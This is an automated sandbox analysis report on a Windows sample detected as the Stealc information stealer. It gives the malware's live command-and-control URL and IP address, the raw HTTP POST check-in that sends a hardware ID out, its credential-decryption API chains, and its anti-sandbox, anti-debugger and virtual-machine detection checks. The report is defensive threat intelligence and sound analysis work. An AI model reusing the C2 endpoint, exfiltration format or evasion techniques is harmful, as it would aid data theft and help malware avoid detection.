Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1529339
MD5:02978bae9becb20a4ba6f439f8eb552f
SHA1:728da10f79bc011ea19ca78aa8aae0b9946f9f4b
SHA256:669036c06a6fd0494eb7db1eac48d0a477a47d7fff54dcc29fdbf7876ef39900
Tags:exeuser-Bitsight
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 6584 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 02978BAE9BECB20A4BA6F439F8EB552F)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.2208867559.0000000001C9E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000003.2167723747.0000000005830000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Process Memory Space: file.exe PID: 6584JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: file.exe PID: 6584JoeSecurity_StealcYara detected StealcJoe Security

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.file.exe.e40000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-08T21:42:18.802712+020020442431Malware Command and Control Activity Detected192.168.2.549727185.215.113.3780TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: file.exeAvira: detected
                Antivirus detection for URL or domain
                Source: http://185.215.113.37/URL Reputation: Label: malware
                Source: http://185.215.113.37URL Reputation: Label: malware
                Source: http://185.215.113.37/e2b1563c6670f193.phpURL Reputation: Label: malware
                Found malware configuration
                Source: 0.2.file.exe.e40000.0.unpackMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: file.exeJoe Sandbox ML: detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E4C820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,0_2_00E4C820
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E49AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_00E49AC0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E47240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_00E47240
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E49B60 CryptUnprotectData,LocalAlloc,LocalFree,0_2_00E49B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E58EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_00E58EA0
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E538B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_00E538B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E54910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00E54910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E4DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_00E4DA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E4E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_00E4E430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E54570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00E54570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E4ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_00E4ED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E416D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00E416D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E53EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00E53EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E4F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00E4F6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E4F68A FindFirstFileA,0_2_00E4F68A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E4BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_00E4BE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E4DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00E4DE10

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49727 -> 185.215.113.37:80
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: http://185.215.113.37/e2b1563c6670f193.php
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BGCBGCAFIIECBFIDHIJKHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 47 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 37 43 36 42 39 38 41 36 31 39 44 31 35 32 34 37 35 30 30 33 37 0d 0a 2d 2d 2d 2d 2d 2d 42 47 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 42 47 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 4a 4b 2d 2d 0d 0a Data Ascii: ------BGCBGCAFIIECBFIDHIJKContent-Disposition: form-data; name="hwid"B7C6B98A619D1524750037------BGCBGCAFIIECBFIDHIJKContent-Disposition: form-data; name="build"doma------BGCBGCAFIIECBFIDHIJK--
                Source: Joe Sandbox ViewIP Address: 185.215.113.37 185.215.113.37
                Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E44880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_00E44880
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: unknownHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BGCBGCAFIIECBFIDHIJKHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 47 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 37 43 36 42 39 38 41 36 31 39 44 31 35 32 34 37 35 30 30 33 37 0d 0a 2d 2d 2d 2d 2d 2d 42 47 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 42 47 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 4a 4b 2d 2d 0d 0a Data Ascii: ------BGCBGCAFIIECBFIDHIJKContent-Disposition: form-data; name="hwid"B7C6B98A619D1524750037------BGCBGCAFIIECBFIDHIJKContent-Disposition: form-data; name="build"doma------BGCBGCAFIIECBFIDHIJK--
                Source: file.exe, 00000000.00000002.2208867559.0000000001C9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37
                Source: file.exe, 00000000.00000002.2208867559.0000000001CF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/
                Source: file.exe, 00000000.00000002.2208867559.0000000001CF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/U
                Source: file.exe, 00000000.00000002.2208867559.0000000001D1C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
                Source: file.exe, 00000000.00000002.2208867559.0000000001CF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpK
                Source: file.exe, 00000000.00000002.2208867559.0000000001CE2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpU
                Source: file.exe, 00000000.00000002.2208867559.0000000001CF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpo
                Source: file.exe, 00000000.00000002.2208867559.0000000001CF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpz
                Source: file.exe, 00000000.00000002.2208867559.0000000001CF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/ws

                System Summary

                barindex
                PE file contains section with special chars
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012181E60_2_012181E6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012158070_2_01215807
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012130B20_2_012130B2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0121B8890_2_0121B889
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0120FB280_2_0120FB28
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010D8B440_2_010D8B44
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011B23D60_2_011B23D6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0121D3D50_2_0121D3D5
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0120EA760_2_0120EA76
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011D35020_2_011D3502
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012115020_2_01211502
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01281D4E0_2_01281D4E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01115D760_2_01115D76
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01219D5C0_2_01219D5C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01187C5C0_2_01187C5C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010F775B0_2_010F775B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010F563D0_2_010F563D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010AC6930_2_010AC693
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0111D6D30_2_0111D6D3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0121EEE20_2_0121EEE2
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 00E445C0 appears 316 times
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: file.exeStatic PE information: Section: gklmxpts ZLIB complexity 0.9951693297511313
                Source: file.exeStatic PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
                Source: file.exe, 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2167723747.0000000005830000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
                Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E58680 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,0_2_00E58680
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E53720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_00E53720
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\Q36JKFCE.htmJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                Source: file.exeStatic file information: File size 1853440 > 1048576
                Source: file.exeStatic PE information: Raw size of gklmxpts is bigger than: 0x100000 < 0x19e600

                Data Obfuscation

                barindex
                Detected unpacking (changes PE section rights)
                Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.e40000.0.unpack :EW;.rsrc :W;.idata :W; :EW;gklmxpts:EW;csoyoskk:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;gklmxpts:EW;csoyoskk:EW;.taggant:EW;
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E59860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00E59860
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: file.exeStatic PE information: real checksum: 0x1ce078 should be: 0x1c8fa5
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: gklmxpts
                Source: file.exeStatic PE information: section name: csoyoskk
                Source: file.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01248B89 push ebx; mov dword ptr [esp], edi0_2_01248BB2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01248B89 push edx; mov dword ptr [esp], 3AFF6CE1h0_2_01248C9D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01248B89 push esi; mov dword ptr [esp], 5DBA2B70h0_2_01248CD9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01248B89 push ecx; mov dword ptr [esp], 387B7703h0_2_01248D18
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01324115 push 03BF3C18h; mov dword ptr [esp], ebp0_2_0132EDE8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01324115 push ebx; mov dword ptr [esp], ecx0_2_0132EF37
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01324115 push 6A93C5E8h; mov dword ptr [esp], ebx0_2_0132EFFA
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01324115 push 74456157h; mov dword ptr [esp], ecx0_2_0132F002
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01324115 push edx; mov dword ptr [esp], ecx0_2_0132F058
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0130191F push 5534F719h; mov dword ptr [esp], ebx0_2_01301944
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012E916F push 45E9B3DDh; mov dword ptr [esp], eax0_2_012E92A6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0122C1B9 push esi; mov dword ptr [esp], eax0_2_0122C218
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012181E6 push esi; mov dword ptr [esp], edi0_2_012181EB
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012181E6 push ecx; mov dword ptr [esp], 5BDDE026h0_2_01218274
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012181E6 push esi; mov dword ptr [esp], 72AD7D47h0_2_01218314
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012181E6 push edx; mov dword ptr [esp], eax0_2_0121834A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012181E6 push eax; mov dword ptr [esp], 7FFFBD50h0_2_01218390
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012181E6 push edx; mov dword ptr [esp], esp0_2_012184BF
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012181E6 push edx; mov dword ptr [esp], edi0_2_012184DB
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012181E6 push 43A96438h; mov dword ptr [esp], ebx0_2_01218588
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012181E6 push esi; mov dword ptr [esp], eax0_2_012185D3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012181E6 push 4EB4D7FFh; mov dword ptr [esp], edx0_2_01218631
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012181E6 push ecx; mov dword ptr [esp], 75DFE4D1h0_2_01218687
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012181E6 push 67479BC0h; mov dword ptr [esp], ebp0_2_01218716
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012181E6 push 16503C8Ch; mov dword ptr [esp], ebp0_2_0121879A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012181E6 push 4593BADCh; mov dword ptr [esp], edx0_2_012187D6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012181E6 push 0DBA74D9h; mov dword ptr [esp], ecx0_2_012187DE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012181E6 push ebp; mov dword ptr [esp], ecx0_2_01218813
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012181E6 push esi; mov dword ptr [esp], eax0_2_012188CC
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012181E6 push edi; mov dword ptr [esp], ebx0_2_01218927
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012181E6 push 329181FCh; mov dword ptr [esp], ebx0_2_01218945
                Source: file.exeStatic PE information: section name: gklmxpts entropy: 7.955274531054208

                Boot Survival

                barindex
                Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E59860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00E59860

                Malware Analysis System Evasion

                barindex
                Found evasive API chain (may stop execution after checking locale)
                Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-13406
                Tries to detect sandboxes / dynamic malware analysis system (registry check)
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Tries to detect virtualization through RDTSC time measurements
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12160B8 second address: 12160D5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F39A52A2E62h 0x00000007 pushad 0x00000008 jne 00007F39A52A2E56h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12160D5 second address: 12160DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1224AFF second address: 1224B23 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F39A52A2E67h 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ebx 0x0000000c pushad 0x0000000d popad 0x0000000e pop ebx 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1224B23 second address: 1224B61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F39A52A77D0h 0x00000009 pop eax 0x0000000a ja 00007F39A52A77CEh 0x00000010 popad 0x00000011 push edx 0x00000012 jmp 00007F39A52A77D6h 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1224B61 second address: 1224B67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1224C86 second address: 1224C8A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1224C8A second address: 1224C95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
